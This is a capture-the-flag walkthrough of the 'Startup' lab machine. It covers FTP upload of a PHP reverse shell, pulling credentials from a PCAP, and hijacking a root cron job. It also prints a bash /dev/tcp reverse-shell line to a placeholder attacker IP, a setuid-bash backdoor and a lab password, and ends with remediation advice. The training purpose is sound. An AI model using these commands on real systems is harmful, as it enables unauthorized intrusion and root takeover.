Target IP: startup.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (lennie) & Root (root.txt) Flags

1. Executive Summary

“Startup” is a Linux machine hosting a website under development. Initial access is gained by exploiting a writable Anonymous FTP directory that is also served by the Web Server, allowing for the upload and execution of a PHP reverse shell. Lateral movement involves analyzing a PCAP file found on the system to recover plaintext passwords. Privilege escalation exploits a custom script (planner.sh) executed by a root Cron job, which calls a second script (/etc/print.sh) that is writable by the user.

Key TTPs (MITRE ATT&CK):

  • T1078 (Valid Accounts): Anonymous FTP and SSH credentials.
  • T1190 (Exploit Public-Facing App): Uploading PHP webshell via FTP.
  • T1040 (Network Sniffing): Analyzing PCAP files for credentials.
  • T1053 (Scheduled Task/Job): Exploiting a writable script executed by Cron.

2. Operational Setup

Host Configuration

echo "10.10.x.x startup.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Nmap identifies three key services:

  • 21/tcp (FTP): Anonymous login allowed, and the ftp directory is writable.
  • 22/tcp (SSH): Open.
  • 80/tcp (HTTP): Web server displaying a maintenance page.
  1. FTP Inspection: We log in anonymously and see important.jpg and notice.txt.
  2. Web Inspection: We fuzzy the web server and find /files.
  3. Correlation: Accessing http://startup.thm/files/ftp/notice.txt confirms that the files in the FTP server are hosted directly by the web server.
  • Vulnerability: We can upload code via FTP and execute it via HTTP.

4. Initial Access: The Webshell

A. The Upload

We create a PHP reverse shell (e.g., PentestMonkey).

# On attacker machine
mv php-reverse-shell.php shell.php
# Edit shell.php with your IP and Port
 
# Connect to FTP
ftp startup.thm
> cd ftp
> put shell.php

B. The Trigger

  1. Start Listener: nc -lvnp 4444.
  2. Execute: curl http://startup.thm/files/ftp/shell.php.

Status: Shell as www-data.


5. Lateral Movement: Forensics

A. Enumeration

Running linpeas.sh or manual exploration reveals a suspicious directory /incidents (or simply located at /).

  • File: suspicious.pcapng.
  • Action: We exfiltrate this file to our attacker machine (using python server or nc).

B. PCAP Analysis

We open the PCAP in Wireshark.

  1. Filter: tcp.stream eq X (Right-click a packet -> Follow TCP Stream).
  2. Findings: We see a user attempting to access a protected resource or log in.
  3. Credentials:
  • User: lennie
  • Password: c4ntg3t3n0ughsp1c3

C. SSH Access

ssh lennie@startup.thm
# Password: c4ntg3t3n0ughsp1c3

Status: User lennie.


6. Privilege Escalation: The Writable Script

A. Enumeration

In Lennie’s home directory, we see a folder ~/scripts.

ls -la ~/scripts
# -rwxr-xr-x 1 root root 77 planner.sh
  • Observation: planner.sh is owned by root.
  • Content:
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh  <-- INTERSTING CALL
  • Cron Check: Since we can’t see the cron as a user, we use pspy or infer from file timestamps that planner.sh is running every minute as root.

B. The Vulnerability

We check the permissions of the script being called, /etc/print.sh.

ls -la /etc/print.sh
# -rwxr-x--- 1 lennie lennie ... /etc/print.sh

Critical Flaw: The root script (planner.sh) calls a script owned by lennie (print.sh). Since we are lennie, we can modify print.sh.

C. Exploitation

We replace the contents of /etc/print.sh with a reverse shell.

echo "bash -i >& /dev/tcp/10.10.YOUR.IP/9001 0>&1" >> /etc/print.sh

Note: Or simply chmod +s /bin/bash if you want a simpler persistent backdoor.

Execution:

  1. Start listener: nc -lvnp 9001.
  2. Wait 60 seconds.
  3. Root Shell.

Root Flag: /root/root.txt.


7. Remediation (Blue Team)

  1. FTP Configuration:
  • Disable Anonymous FTP upload.
  • Critical: Never map an FTP upload directory to an executable Web directory (/var/www/html). Use a separate storage location that does not execute PHP.
  1. Script Permissions:
  • Scripts executed by root (via Cron) should verify that all dependencies and called scripts (/etc/print.sh) are also owned by root and writable only by root.
  1. Sensitive Data:
  • Remove forensic artifacts (suspicious.pcapng) containing plaintext credentials from the production server.